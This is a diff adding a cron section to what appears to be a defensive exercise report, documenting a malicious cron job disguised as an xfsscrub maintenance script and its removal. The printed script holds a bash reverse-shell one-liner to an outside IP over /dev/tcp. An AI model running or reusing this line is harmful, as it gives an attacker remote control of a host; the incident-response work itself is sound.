Cronjob done

report/Report.md

@@ -481,5 +481,46 @@ root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
 
 This is all I found suspicious in the DNS configuration.
 
+### Cron
+
+Susipicious cron jobs:
+
+```bash
+root@ls-2024-9:/etc/cron.d# cat e2scrub_all
+MAILTO=""
+30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
+10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
+5-55/10 * * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/xfsscrub_all -A -r
+```
+
+The third script has a reverse shell in it:
+
+```bash
+root@ls-2024-9:/etc/cron.d# cat /sbin/xfsscrub_all
+#!/bin/bash
+/bin/bash -i >& /dev/tcp/138.68.128.150/8080 || true >> /dev/null 0>&1 2>&1
+```
+
+Remove the entry from the cron.
+And restart the cron service.
+
+```bash
+root@ls-2024-9:/etc/cron.d# systemctl restart cron
+```
+
+And checked this one it is also safe:
+
+```bash
+root@ls-2024-9:/etc/cron.d# cat sysstat
+# The first element of the path is a directory where the debian-sa1
+# script is located
+PATH=/usr/lib/sysstat:/usr/sbin:/usr/sbin:/usr/bin:/sbin:/bin
+
+# Activity reports every 10 minutes everyday
+5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1
+
+# Additional run at 23:59 to rotate the statistics file
+59 23 * * * root command -v debian-sa1 > /dev/null && debian-sa1 60 2
+```